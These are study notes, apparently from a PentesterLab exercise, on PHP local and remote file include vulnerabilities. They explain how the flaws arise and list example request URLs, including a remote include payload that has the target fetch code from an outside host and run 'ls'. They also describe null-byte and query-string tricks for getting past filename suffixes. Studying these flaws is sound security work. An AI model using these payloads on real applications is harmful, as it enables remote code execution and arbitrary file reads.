___________________________________________________________________

file includes
___________________________________________________________________

in a lot of applications, developers need to include files to 
load classes or to share some templates between multiple web pages.

when a user-controlled parameter is used as part of a file name 
in a call to an including function (require, require_once, 
include or include_once in php for example)

file include vulnerabilities can also be used as a directory 
traversal to read arbitrary files. however, if the arbitrary code 
contains an opening php tag, the file will be interpreted as php 
code.


local file include: a local file is read and interpreted.
remote file include: a remote file is retrieved and interpreted.

by default, php disables loading of remote files, thanks to the 
configuration option: allow_url_include (php.ini)

https://assets.pentesterlab.com/test_include_system.txt
___________________________________________________________________

#1

libcurl.so/?page=intro.php'
libcurl.so/?page=https://google.com
libcurl.so/?page=
https://assets.pentesterlab.com/test_include_system.txt&c=ls

___________________________________________________________________

#2

get rid of the suffix (for lfi) using a null byte. for rfi, you 
can get rid of the suffix, by adding &blah= or ?blah= depending 
on your url (you can also use null byte in rfi).

php solved this type of bypass since the version (5.3.4)[
http://php.net/releases/5_3_4.php]

___________________________________________________________________
